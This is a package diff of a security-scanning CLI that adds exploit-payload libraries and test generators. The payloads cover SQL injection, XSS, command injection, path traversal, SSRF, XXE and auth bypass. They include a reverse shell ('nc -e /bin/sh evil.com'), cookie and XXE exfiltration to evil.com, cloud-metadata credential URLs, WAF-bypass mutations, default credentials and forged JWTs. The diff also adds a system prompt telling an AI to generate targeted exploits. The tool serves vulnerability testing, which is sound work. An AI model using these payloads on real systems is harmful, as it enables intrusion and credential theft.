pinata-security-cli 0.4.1 → 0.5.1

package/dist/cli/index.js

@@ -1271,7 +1271,11 @@ var init_types2 = __esm({
       "command-injection",
       "path-traversal",
       "ssrf",
-      "deserialization"
+      "xxe",
+      "deserialization",
+      "missing-authentication",
+      "idor",
+      "open-redirect"
     ];
   }
 });
@@ -1731,6 +1735,495 @@ var init_results = __esm({
   }
 });
 
+// src/execution/payloads.ts
+function mutatePayload(payload, maxMutations = 5) {
+  const mutations = [payload];
+  for (const strategy of MUTATION_STRATEGIES.slice(0, maxMutations)) {
+    try {
+      const mutated = strategy.apply(payload);
+      if (mutated !== payload && !mutations.includes(mutated)) {
+        mutations.push(mutated);
+      }
+    } catch {
+    }
+  }
+  return mutations;
+}
+function getPayloadsForCategory(categoryId) {
+  switch (categoryId) {
+    case "sql-injection":
+      return [
+        ...SQL_INJECTION_PAYLOADS.boolean,
+        ...SQL_INJECTION_PAYLOADS.union,
+        ...SQL_INJECTION_PAYLOADS.error
+      ];
+    case "xss":
+      return [
+        ...XSS_PAYLOADS.script,
+        ...XSS_PAYLOADS.event,
+        ...XSS_PAYLOADS.bypass
+      ];
+    case "command-injection":
+      return [
+        ...COMMAND_INJECTION_PAYLOADS.semicolon,
+        ...COMMAND_INJECTION_PAYLOADS.pipe,
+        ...COMMAND_INJECTION_PAYLOADS.substitution
+      ];
+    case "path-traversal":
+      return [
+        ...PATH_TRAVERSAL_PAYLOADS.basic,
+        ...PATH_TRAVERSAL_PAYLOADS.urlEncoded,
+        ...PATH_TRAVERSAL_PAYLOADS.bypass
+      ];
+    case "ssrf":
+      return [
+        ...SSRF_PAYLOADS.localhost,
+        ...SSRF_PAYLOADS.internal,
+        ...SSRF_PAYLOADS.cloud
+      ];
+    case "xxe":
+      return [
+        ...XXE_PAYLOADS.basic,
+        ...XXE_PAYLOADS.blind
+      ];
+    case "missing-authentication":
+      return AUTH_BYPASS_PAYLOADS.session;
+    case "idor":
+      return IDOR_PAYLOADS.numeric;
+    case "open-redirect":
+      return [
+        ...OPEN_REDIRECT_PAYLOADS.basic,
+        ...OPEN_REDIRECT_PAYLOADS.bypass
+      ];
+    default:
+      return [];
+  }
+}
+function getPayloadsWithMutations(categoryId, maxPayloads = 20) {
+  const basePayloads = getPayloadsForCategory(categoryId).slice(0, 5);
+  const allPayloads = [];
+  for (const payload of basePayloads) {
+    allPayloads.push(...mutatePayload(payload, 3));
+  }
+  return [...new Set(allPayloads)].slice(0, maxPayloads);
+}
+var SQL_INJECTION_PAYLOADS, XSS_PAYLOADS, COMMAND_INJECTION_PAYLOADS, PATH_TRAVERSAL_PAYLOADS, SSRF_PAYLOADS, XXE_PAYLOADS, DESERIALIZATION_PAYLOADS, AUTH_BYPASS_PAYLOADS, IDOR_PAYLOADS, OPEN_REDIRECT_PAYLOADS, urlEncode, doubleUrlEncode, unicodeEncode, randomCase, insertWhitespace, insertSqlComments, htmlEntityEncode, insertNullByte, MUTATION_STRATEGIES;
+var init_payloads = __esm({
+  "src/execution/payloads.ts"() {
+    SQL_INJECTION_PAYLOADS = {
+      /** Boolean-based blind injection */
+      boolean: [
+        "' OR '1'='1",
+        "' OR '1'='1'--",
+        "' OR '1'='1'/*",
+        "1' AND '1'='1",
+        "1' AND '1'='2",
+        "' OR 1=1--",
+        '" OR "1"="1',
+        "') OR ('1'='1",
+        "1 OR 1=1",
+        "1' OR '1'='1' AND ''='"
+      ],
+      /** UNION-based injection */
+      union: [
+        "' UNION SELECT NULL--",
+        "' UNION SELECT NULL,NULL--",
+        "' UNION SELECT NULL,NULL,NULL--",
+        "1 UNION SELECT username,password FROM users--",
+        "1 UNION ALL SELECT 1,2,3,4--",
+        "' UNION SELECT table_name,NULL FROM information_schema.tables--",
+        "' UNION SELECT column_name,NULL FROM information_schema.columns--"
+      ],
+      /** Error-based injection */
+      error: [
+        "'",
+        '"',
+        "1'",
+        '1"',
+        "1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
+        "' AND EXTRACTVALUE(1,CONCAT(0x7e,version(),0x7e))--",
+        "' AND UPDATEXML(1,CONCAT(0x7e,version(),0x7e),1)--"
+      ],
+      /** Time-based blind injection */
+      time: [
+        "' OR SLEEP(5)--",
+        "'; WAITFOR DELAY '0:0:5'--",
+        "' OR pg_sleep(5)--",
+        "1' AND SLEEP(5)--",
+        "1'; SELECT SLEEP(5);--"
+      ],
+      /** Stacked queries */
+      stacked: [
+        "'; DROP TABLE users--",
+        "'; INSERT INTO users VALUES('pwned','pwned')--",
+        "'; UPDATE users SET password='pwned'--",
+        "1; SELECT * FROM users--"
+      ],
+      /** NoSQL injection */
+      nosql: [
+        '{"$gt": ""}',
+        '{"$ne": null}',
+        '{"$where": "1==1"}',
+        "'; return true; var x='",
+        '{"$regex": ".*"}'
+      ]
+    };
+    XSS_PAYLOADS = {
+      /** Basic script injection */
+      script: [
+        '<script>alert("XSS")</script>',
+        "<script>alert(document.cookie)</script>",
+        "<script>alert(1)</script>",
+        '<script src="https://evil.com/xss.js"></script>',
+        '<script>new Image().src="https://evil.com/?c="+document.cookie</script>'
+      ],
+      /** Event handler injection */
+      event: [
+        '<img src=x onerror=alert("XSS")>',
+        '<svg onload=alert("XSS")>',
+        '<body onload=alert("XSS")>',
+        '<input onfocus=alert("XSS") autofocus>',
+        '<marquee onstart=alert("XSS")>',
+        '<video><source onerror=alert("XSS")>',
+        '<details open ontoggle=alert("XSS")>'
+      ],
+      /** URL-based XSS */
+      url: [
+        'javascript:alert("XSS")',
+        "javascript:alert(document.domain)",
+        'data:text/html,<script>alert("XSS")</script>',
+        'vbscript:alert("XSS")'
+      ],
+      /** Filter bypass */
+      bypass: [
+        '<ScRiPt>alert("XSS")</sCrIpT>',
+        '<scr<script>ipt>alert("XSS")</scr</script>ipt>',
+        '"><script>alert("XSS")</script>',
+        "'><script>alert('XSS')</script>",
+        '<img src=x onerror="alert(String.fromCharCode(88,83,83))">',
+        '\\x3cscript\\x3ealert("XSS")\\x3c/script\\x3e',
+        "<script>alert`XSS`</script>"
+      ],
+      /** DOM-based XSS */
+      dom: [
+        '#<script>alert("XSS")</script>',
+        '?q=<script>alert("XSS")</script>',
+        `javascript:/*--></title></style></textarea></script><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>`
+      ]
+    };
+    COMMAND_INJECTION_PAYLOADS = {
+      /** Semicolon separator */
+      semicolon: [
+        "; ls -la",
+        "; id",
+        "; whoami",
+        "; cat /etc/passwd",
+        "; uname -a"
+      ],
+      /** Pipe operator */
+      pipe: [
+        "| ls -la",
+        "| id",
+        "| cat /etc/passwd",
+        "| nc -e /bin/sh evil.com 4444"
+      ],
+      /** Ampersand operators */
+      ampersand: [
+        "&& ls -la",
+        "& ls -la",
+        "|| ls -la"
+      ],
+      /** Backticks and substitution */
+      substitution: [
+        "`id`",
+        "$(id)",
+        "`whoami`",
+        "$(whoami)",
+        "`cat /etc/passwd`"
+      ],
+      /** Newline injection */
+      newline: [
+        "\nid",
+        "\r\nwhoami",
+        "%0aid",
+        "%0d%0awhoami"
+      ],
+      /** Windows-specific */
+      windows: [
+        "& dir",
+        "| type C:\\Windows\\win.ini",
+        "& whoami",
+        "| net user"
+      ]
+    };
+    PATH_TRAVERSAL_PAYLOADS = {
+      /** Basic traversal */
+      basic: [
+        "../../../etc/passwd",
+        "..\\..\\..\\windows\\win.ini",
+        "../../../etc/shadow",
+        "../../../etc/hosts",
+        "../../../../etc/passwd",
+        "../../../../../etc/passwd"
+      ],
+      /** URL encoding */
+      urlEncoded: [
+        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
+        "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+        "..%2f..%2f..%2fetc%2fpasswd",
+        "%252e%252e%252f%252e%252e%252fetc%252fpasswd"
+      ],
+      /** Double encoding */
+      doubleEncoded: [
+        "..%252f..%252f..%252fetc/passwd",
+        "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"
+      ],
+      /** Null byte injection (legacy) */
+      nullByte: [
+        "../../../etc/passwd%00",
+        "../../../etc/passwd%00.jpg",
+        "../../../etc/passwd\0"
+      ],
+      /** Bypass filters */
+      bypass: [
+        "....//....//....//etc/passwd",
+        "..../....//....//etc/passwd",
+        "..;/..;/..;/etc/passwd",
+        "..\\..\\..\\/etc/passwd",
+        "..%c0%af..%c0%af..%c0%afetc/passwd"
+      ]
+    };
+    SSRF_PAYLOADS = {
+      /** Localhost access */
+      localhost: [
+        "http://localhost",
+        "http://127.0.0.1",
+        "http://[::1]",
+        "http://0.0.0.0",
+        "http://0",
+        "http://localhost:22",
+        "http://localhost:25",
+        "http://localhost:3306",
+        "http://localhost:6379",
+        "http://127.1",
+        "http://2130706433"
+        // Decimal IP for 127.0.0.1
+      ],
+      /** Internal network */
+      internal: [
+        "http://192.168.0.1",
+        "http://192.168.1.1",
+        "http://10.0.0.1",
+        "http://172.16.0.1",
+        "http://169.254.169.254",
+        // AWS metadata
+        "http://169.254.169.254/latest/meta-data/",
+        "http://metadata.google.internal",
+        "http://100.100.100.200"
+        // Alibaba Cloud
+      ],
+      /** Cloud metadata endpoints */
+      cloud: [
+        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+        "http://169.254.169.254/latest/user-data/",
+        "http://metadata.google.internal/computeMetadata/v1/",
+        "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
+      ],
+      /** Protocol smuggling */
+      protocols: [
+        "file:///etc/passwd",
+        "gopher://localhost:6379/_INFO",
+        "dict://localhost:6379/INFO",
+        "sftp://evil.com/",
+        "ldap://evil.com/"
+      ],
+      /** DNS rebinding */
+      dnsRebind: [
+        "http://spoofed.burpcollaborator.net",
+        "http://1.1.1.1.xip.io"
+      ]
+    };
+    XXE_PAYLOADS = {
+      /** Basic XXE */
+      basic: [
+        `<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>`,
+        `<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><root>&xxe;</root>`
+      ],
+      /** Parameter entity XXE */
+      parameter: [
+        `<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;]><root></root>`
+      ],
+      /** Blind XXE */
+      blind: [
+        `<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://evil.com/xxe?data=file:///etc/passwd">%xxe;]><root></root>`
+      ],
+      /** XXE via file upload */
+      fileUpload: [
+        `<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><svg>&xxe;</svg>`
+      ],
+      /** XXE in SOAP */
+      soap: [
+        `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>&xxe;</soap:Body></soap:Envelope>`
+      ]
+    };
+    DESERIALIZATION_PAYLOADS = {
+      /** Node.js/JavaScript */
+      nodejs: [
+        `{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id')}()"}`,
+        '{"__proto__":{"polluted":"yes"}}',
+        '{"constructor":{"prototype":{"polluted":"yes"}}}'
+      ],
+      /** Python pickle */
+      python: [
+        // Base64 encoded pickle payloads would go here
+        // These are dangerous so we use detection patterns instead
+      ],
+      /** Java */
+      java: [
+        // Ysoserial-style payloads reference
+        "AC ED 00 05"
+        // Java serialization magic bytes
+      ],
+      /** PHP */
+      php: [
+        'O:8:"stdClass":0:{}',
+        'a:1:{s:4:"test";O:8:"stdClass":0:{}}'
+      ]
+    };
+    AUTH_BYPASS_PAYLOADS = {
+      /** Default credentials */
+      defaultCreds: [
+        { username: "admin", password: "admin" },
+        { username: "admin", password: "password" },
+        { username: "admin", password: "123456" },
+        { username: "root", password: "root" },
+        { username: "test", password: "test" },
+        { username: "guest", password: "guest" }
+      ],
+      /** JWT manipulation */
+      jwt: [
+        // Algorithm none
+        "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.",
+        // Empty signature
+        "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9."
+      ],
+      /** Session manipulation */
+      session: [
+        "admin=true",
+        "role=admin",
+        "isAdmin=1",
+        "authenticated=true"
+      ],
+      /** Header injection */
+      headers: [
+        { "X-Forwarded-For": "127.0.0.1" },
+        { "X-Original-URL": "/admin" },
+        { "X-Rewrite-URL": "/admin" },
+        { "X-Custom-IP-Authorization": "127.0.0.1" }
+      ]
+    };
+    IDOR_PAYLOADS = {
+      /** Numeric ID manipulation */
+      numeric: [
+        "1",
+        "2",
+        "0",
+        "-1",
+        "9999999",
+        "1000000000"
+      ],
+      /** UUID/GUID manipulation */
+      uuid: [
+        "00000000-0000-0000-0000-000000000000",
+        "11111111-1111-1111-1111-111111111111"
+      ],
+      /** Hash prediction */
+      hash: [
+        "admin",
+        "user",
+        "test",
+        "1",
+        "0"
+      ]
+    };
+    OPEN_REDIRECT_PAYLOADS = {
+      /** Basic redirects */
+      basic: [
+        "https://evil.com",
+        "//evil.com",
+        "/\\evil.com",
+        "https://evil.com%2f%2f"
+      ],
+      /** Filter bypass */
+      bypass: [
+        "https://evil.com?.trusted.com",
+        "https://trusted.com@evil.com",
+        "https://trusted.com.evil.com",
+        "javascript:alert(document.domain)",
+        "///evil.com",
+        "\\/\\/evil.com"
+      ],
+      /** Encoded */
+      encoded: [
+        "https:%2F%2Fevil.com",
+        "https:%252F%252Fevil.com",
+        "%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d"
+      ]
+    };
+    urlEncode = {
+      name: "url-encode",
+      apply: (p) => encodeURIComponent(p)
+    };
+    doubleUrlEncode = {
+      name: "double-url-encode",
+      apply: (p) => encodeURIComponent(encodeURIComponent(p))
+    };
+    unicodeEncode = {
+      name: "unicode-encode",
+      apply: (p) => {
+        return p.split("").map((c) => {
+          const code = c.charCodeAt(0);
+          return code > 127 ? c : `\\u${code.toString(16).padStart(4, "0")}`;
+        }).join("");
+      }
+    };
+    randomCase = {
+      name: "random-case",
+      apply: (p) => {
+        return p.split("").map((c) => Math.random() > 0.5 ? c.toUpperCase() : c.toLowerCase()).join("");
+      }
+    };
+    insertWhitespace = {
+      name: "insert-whitespace",
+      apply: (p) => p.replace(/([<>])/g, " $1 ").replace(/  +/g, " ")
+    };
+    insertSqlComments = {
+      name: "sql-comments",
+      apply: (p) => p.replace(/ /g, "/**/")
+    };
+    htmlEntityEncode = {
+      name: "html-entity",
+      apply: (p) => {
+        return p.replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;").replace(/'/g, "&#39;");
+      }
+    };
+    insertNullByte = {
+      name: "null-byte",
+      apply: (p) => p + "%00"
+    };
+    MUTATION_STRATEGIES = [
+      urlEncode,
+      doubleUrlEncode,
+      unicodeEncode,
+      randomCase,
+      insertWhitespace,
+      insertSqlComments,
+      htmlEntityEncode,
+      insertNullByte
+    ];
+  }
+});
+
 // src/execution/generator.ts
 function generateExploitTest(gap, targetCode, language) {
   const categoryId = gap.categoryId;
@@ -1743,6 +2236,16 @@ function generateExploitTest(gap, targetCode, language) {
       return generateCommandInjectionTest(gap, targetCode);
     case "path-traversal":
       return generatePathTraversalTest(gap, targetCode);
+    case "ssrf":
+      return generateSsrfTest(gap, targetCode);
+    case "xxe":
+      return generateXxeTest(gap, targetCode);
+    case "missing-authentication":
+      return generateAuthBypassTest(gap, targetCode);
+    case "idor":
+      return generateIdorTest(gap, targetCode);
+    case "open-redirect":
+      return generateOpenRedirectTest(gap, targetCode);
     default:
       return generateGenericTest(gap, targetCode);
   }
@@ -1987,6 +2490,258 @@ describe('Path Traversal Exploit - ${gap.filePath}:${gap.lineStart}', () => {
 });
 `.trim();
 }
+function generateSsrfTest(gap, targetCode, language) {
+  const payloads = JSON.stringify(SSRF_PAYLOADS.localhost.slice(0, 5));
+  const cloudPayloads = JSON.stringify(SSRF_PAYLOADS.cloud.slice(0, 3));
+  return `
+import { describe, it, expect } from 'vitest';
+
+describe('SSRF Exploit - ${gap.filePath}:${gap.lineStart}', () => {
+  const LOCALHOST_PAYLOADS = ${payloads};
+  const CLOUD_METADATA_PAYLOADS = ${cloudPayloads};
+
+  it('exploit: internal network access via localhost variants', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check if URL is fetched without validation
+    const usesFetch = targetCode.includes('fetch(') ||
+                      targetCode.includes('axios') ||
+                      targetCode.includes('request(') ||
+                      targetCode.includes('http.get');
+    
+    const hasUrlValidation = targetCode.includes('allowlist') ||
+                             targetCode.includes('whitelist') ||
+                             targetCode.includes('isValidUrl') ||
+                             targetCode.includes('URL(');
+    
+    // Vulnerable: fetches URLs without validation
+    if (usesFetch) {
+      expect(hasUrlValidation).toBe(false);
+    }
+  });
+
+  it('exploit: cloud metadata endpoint access', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // AWS/GCP/Azure metadata endpoints should be blocked
+    const blocksMetadata = targetCode.includes('169.254.169.254') ||
+                           targetCode.includes('metadata.google') ||
+                           targetCode.includes('blockInternal');
+    
+    expect(blocksMetadata).toBe(false);
+  });
+
+  it('exploit: protocol smuggling (file://, gopher://)', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check if non-HTTP protocols are allowed
+    const restrictsProtocol = targetCode.includes('http://') ||
+                              targetCode.includes('https://') ||
+                              targetCode.includes('protocol === "http"');
+    
+    // Vulnerable if no protocol restriction
+    expect(restrictsProtocol).toBe(false);
+  });
+});
+`.trim();
+}
+function generateXxeTest(gap, targetCode, language) {
+  return `
+import { describe, it, expect } from 'vitest';
+
+describe('XXE Exploit - ${gap.filePath}:${gap.lineStart}', () => {
+  const XXE_PAYLOADS = [
+    '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
+    '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;]><root></root>',
+  ];
+
+  it('exploit: XML parser allows external entities', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check for XML parsing
+    const parsesXml = targetCode.includes('parseXML') ||
+                      targetCode.includes('DOMParser') ||
+                      targetCode.includes('xml2js') ||
+                      targetCode.includes('xmldom') ||
+                      targetCode.includes('XMLParser') ||
+                      targetCode.includes('parseString');
+    
+    // Check for XXE protection
+    const hasProtection = targetCode.includes('noent: false') ||
+                          targetCode.includes('NOENT') ||
+                          targetCode.includes('disallow-doctype-decl') ||
+                          targetCode.includes('external-general-entities');
+    
+    // Vulnerable: parses XML without XXE protection
+    if (parsesXml) {
+      expect(hasProtection).toBe(false);
+    }
+  });
+
+  it('exploit: DTD processing enabled', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // DTD processing should be disabled
+    const disablesDtd = targetCode.includes('DOCTYPE') &&
+                        (targetCode.includes('false') || targetCode.includes('reject'));
+    
+    expect(disablesDtd).toBe(false);
+  });
+});
+`.trim();
+}
+function generateAuthBypassTest(gap, targetCode, language) {
+  const defaultCreds = JSON.stringify(AUTH_BYPASS_PAYLOADS.defaultCreds.slice(0, 3));
+  return `
+import { describe, it, expect } from 'vitest';
+
+describe('Auth Bypass Exploit - ${gap.filePath}:${gap.lineStart}', () => {
+  const DEFAULT_CREDENTIALS = ${defaultCreds};
+  
+  const BYPASS_HEADERS = [
+    { 'X-Forwarded-For': '127.0.0.1' },
+    { 'X-Original-URL': '/admin' },
+    { 'X-Custom-IP-Authorization': '127.0.0.1' },
+  ];
+
+  it('exploit: missing authentication check', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check for auth middleware/guards
+    const hasAuthCheck = targetCode.includes('isAuthenticated') ||
+                         targetCode.includes('requireAuth') ||
+                         targetCode.includes('verifyToken') ||
+                         targetCode.includes('passport.') ||
+                         targetCode.includes('authMiddleware') ||
+                         targetCode.includes('session.user');
+    
+    // Vulnerable: no authentication check
+    expect(hasAuthCheck).toBe(false);
+  });
+
+  it('exploit: authorization bypass via header injection', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check if X-Forwarded-For is trusted
+    const trustsForwardedHeaders = targetCode.includes('x-forwarded-for') ||
+                                   targetCode.includes('X-Forwarded-For') ||
+                                   targetCode.includes('trust proxy');
+    
+    const validatesSource = targetCode.includes('validateIP') ||
+                            targetCode.includes('allowedIPs');
+    
+    // Vulnerable if trusts headers without validation
+    if (trustsForwardedHeaders) {
+      expect(validatesSource).toBe(false);
+    }
+  });
+
+  it('exploit: JWT algorithm confusion', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check for JWT handling
+    const handlesJwt = targetCode.includes('jwt.verify') ||
+                       targetCode.includes('jsonwebtoken') ||
+                       targetCode.includes('jose');
+    
+    // Check if algorithm is enforced
+    const enforcesAlgorithm = targetCode.includes('algorithms:') ||
+                              targetCode.includes('HS256') ||
+                              targetCode.includes('RS256');
+    
+    // Vulnerable if JWT used without algorithm enforcement
+    if (handlesJwt) {
+      expect(enforcesAlgorithm).toBe(true);
+    }
+  });
+});
+`.trim();
+}
+function generateIdorTest(gap, targetCode, language) {
+  return `
+import { describe, it, expect } from 'vitest';
+
+describe('IDOR Exploit - ${gap.filePath}:${gap.lineStart}', () => {
+  const ID_PAYLOADS = ['1', '2', '0', '-1', '9999999', '1000000000'];
+
+  it('exploit: direct object reference without ownership check', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check for ID usage
+    const usesId = targetCode.includes('params.id') ||
+                   targetCode.includes('req.params') ||
+                   targetCode.includes('userId') ||
+                   targetCode.includes('resourceId');
+    
+    // Check for ownership validation
+    const checksOwnership = targetCode.includes('user.id ===') ||
+                            targetCode.includes('userId ===') ||
+                            targetCode.includes('belongsTo') ||
+                            targetCode.includes('isOwner') ||
+                            targetCode.includes('canAccess');
+    
+    // Vulnerable: uses ID without ownership check
+    if (usesId) {
+      expect(checksOwnership).toBe(false);
+    }
+  });
+
+  it('exploit: sequential/predictable IDs', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check for UUID usage (more secure)
+    const usesUuid = targetCode.includes('uuid') ||
+                     targetCode.includes('UUID') ||
+                     targetCode.includes('uuidv4');
+    
+    // Using sequential IDs is vulnerable
+    expect(usesUuid).toBe(false);
+  });
+});
+`.trim();
+}
+function generateOpenRedirectTest(gap, targetCode, language) {
+  const payloads = JSON.stringify(OPEN_REDIRECT_PAYLOADS.bypass.slice(0, 5));
+  return `
+import { describe, it, expect } from 'vitest';
+
+describe('Open Redirect Exploit - ${gap.filePath}:${gap.lineStart}', () => {
+  const REDIRECT_PAYLOADS = ${payloads};
+
+  it('exploit: unvalidated redirect URL', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check for redirect
+    const hasRedirect = targetCode.includes('redirect(') ||
+                        targetCode.includes('res.redirect') ||
+                        targetCode.includes('location.href') ||
+                        targetCode.includes('window.location');
+    
+    // Check for URL validation
+    const validatesUrl = targetCode.includes('allowedUrls') ||
+                         targetCode.includes('whitelist') ||
+                         targetCode.includes('startsWith("/")') ||
+                         targetCode.includes('isRelative') ||
+                         targetCode.includes('isSameDomain');
+    
+    // Vulnerable: redirects without validation
+    if (hasRedirect) {
+      expect(validatesUrl).toBe(false);
+    }
+  });
+
+  it('exploit: protocol-relative URL bypass', () => {
+    const targetCode = \`${escapeTemplate(targetCode)}\`;
+    
+    // Check if // URLs are blocked
+    const blocksProtocolRelative = targetCode.includes('startsWith("//")') ||
+                                   targetCode.includes('/^\\\\/\\\\//');
+    
+    expect(blocksProtocolRelative).toBe(false);
+  });
+});
+`.trim();
+}
 function generateGenericTest(gap, targetCode, language) {
   return `
 import { describe, it, expect } from 'vitest';
@@ -2007,6 +2762,7 @@ function escapeTemplate(code) {
 }
 var init_generator = __esm({
   "src/execution/generator.ts"() {
+    init_payloads();
   }
 });
 
@@ -2198,17 +2954,489 @@ ${"\u2500".repeat(50)}`);
   }
 });
 
+// src/execution/ai-payloads.ts
+function generatePayloadPrompt(context) {
+  const { gap, code, techStack } = context;
+  return `Analyze this ${gap.categoryId} vulnerability and generate targeted exploit payloads.
+
+## Vulnerability Type
+${gap.categoryId}
+
+## Vulnerable Code
+\`\`\`${techStack.language}
+${code}
+\`\`\`
+
+## Technology Stack
+- Language: ${techStack.language}
+- Framework: ${techStack.framework ?? "unknown"}
+- Database: ${techStack.database ?? "unknown"}
+- ORM: ${techStack.orm ?? "unknown"}
+- Has WAF: ${techStack.hasWaf ? "yes" : "no/unknown"}
+- Has Escaping: ${techStack.hasEscaping ? "yes" : "no/unknown"}
+
+## Detection Context
+- File: ${gap.filePath}
+- Line: ${gap.lineStart}
+- Pattern: ${gap.categoryId}
+
+Generate 3-5 targeted payloads that would exploit THIS SPECIFIC code.
+Consider the exact variable names, function calls, and data flow shown above.`;
+}
+function extractTechStack(code, filePath) {
+  const hints = {
+    language: detectLanguage2(filePath)
+  };
+  if (code.includes("express") || code.includes("app.get") || code.includes("app.post")) {
+    hints.framework = "express";
+  } else if (code.includes("fastify")) {
+    hints.framework = "fastify";
+  } else if (code.includes("django") || code.includes("from django")) {
+    hints.framework = "django";
+  } else if (code.includes("flask") || code.includes("from flask")) {
+    hints.framework = "flask";
+  } else if (code.includes("gin.") || code.includes("fiber.")) {
+    hints.framework = code.includes("gin.") ? "gin" : "fiber";
+  }
+  if (code.includes("postgres") || code.includes("pg.") || code.includes("$1")) {
+    hints.database = "postgres";
+  } else if (code.includes("mysql") || code.includes("?") && code.includes("query")) {
+    hints.database = "mysql";
+  } else if (code.includes("mongodb") || code.includes("mongoose") || code.includes("$where")) {
+    hints.database = "mongodb";
+  } else if (code.includes("sqlite") || code.includes("sqlite3")) {
+    hints.database = "sqlite";
+  }
+  if (code.includes("prisma")) {
+    hints.orm = "prisma";
+  } else if (code.includes("sequelize")) {
+    hints.orm = "sequelize";
+  } else if (code.includes("typeorm") || code.includes("TypeORM")) {
+    hints.orm = "typeorm";
+  } else if (code.includes("sqlalchemy") || code.includes("SQLAlchemy")) {
+    hints.orm = "sqlalchemy";
+  }
+  hints.hasEscaping = code.includes("escape") || code.includes("sanitize") || code.includes("DOMPurify") || code.includes("htmlspecialchars");
+  hints.hasWaf = code.includes("waf") || code.includes("WAF") || code.includes("cloudflare") || code.includes("akamai");
+  return hints;
+}
+function detectLanguage2(filePath) {
+  if (filePath.endsWith(".ts") || filePath.endsWith(".tsx")) return "typescript";
+  if (filePath.endsWith(".js") || filePath.endsWith(".jsx")) return "javascript";
+  if (filePath.endsWith(".py")) return "python";
+  if (filePath.endsWith(".go")) return "go";
+  if (filePath.endsWith(".java")) return "java";
+  if (filePath.endsWith(".rb")) return "ruby";
+  if (filePath.endsWith(".php")) return "php";
+  return "unknown";
+}
+function parseAiPayloadResponse(response) {
+  try {
+    const jsonMatch = response.match(/\{[\s\S]*"payloads"[\s\S]*\}/);
+    if (!jsonMatch) {
+      return [];
+    }
+    const parsed = JSON.parse(jsonMatch[0]);
+    if (!parsed.payloads || !Array.isArray(parsed.payloads)) {
+      return [];
+    }
+    return parsed.payloads.filter(
+      (p) => typeof p.payload === "string" && typeof p.rationale === "string" && p.payload.length > 0
+    );
+  } catch {
+    return [];
+  }
+}
+function combinePayloads(aiPayloads, categoryId, maxTotal = 20) {
+  const aiStrings = aiPayloads.map((p) => p.payload);
+  const basePayloads = getPayloadsForCategory(categoryId);
+  const combined = [.../* @__PURE__ */ new Set([...aiStrings, ...basePayloads])];
+  return combined.slice(0, maxTotal);
+}
+function getFallbackPayloads(context, maxPayloads = 10) {
+  const { gap, techStack } = context;
+  const categoryId = gap.categoryId;
+  let payloads = getPayloadsForCategory(categoryId);
+  if (techStack.database === "postgres") {
+    if (categoryId === "sql-injection") {
+      payloads = payloads.concat([
+        "1; SELECT pg_sleep(5)--",
+        "1' OR '1'='1' -- ",
+        "1 UNION SELECT NULL,NULL,version()--"
+      ]);
+    }
+  } else if (techStack.database === "mongodb") {
+    if (categoryId === "sql-injection") {
+      payloads = payloads.concat([
+        '{"$gt": ""}',
+        '{"$ne": null}',
+        '{"$regex": ".*"}',
+        '{"$where": "1==1"}'
+      ]);
+    }
+  }
+  if (techStack.hasWaf) {
+    payloads = payloads.flatMap((p) => mutatePayload(p, 3));
+  }
+  return [...new Set(payloads)].slice(0, maxPayloads);
+}
+var AI_PAYLOAD_SYSTEM_PROMPT;
+var init_ai_payloads = __esm({
+  "src/execution/ai-payloads.ts"() {
+    init_payloads();
+    AI_PAYLOAD_SYSTEM_PROMPT = `You are an expert penetration tester and security researcher.
+Your task is to analyze vulnerable code and generate targeted exploit payloads.
+
+You will receive:
+1. A code snippet containing a potential vulnerability
+2. The vulnerability type (SQL injection, XSS, etc.)
+3. Technology stack information
+
+Your job is to:
+1. Analyze the specific implementation
+2. Identify exactly how the vulnerability can be exploited
+3. Generate 3-5 targeted payloads that exploit this specific code
+4. Consider any defenses (escaping, WAF, etc.) and suggest bypasses
+
+Focus on PRACTICAL exploitation, not theoretical vulnerabilities.
+Consider:
+- The exact syntax of the vulnerable code
+- Variable names and data flow
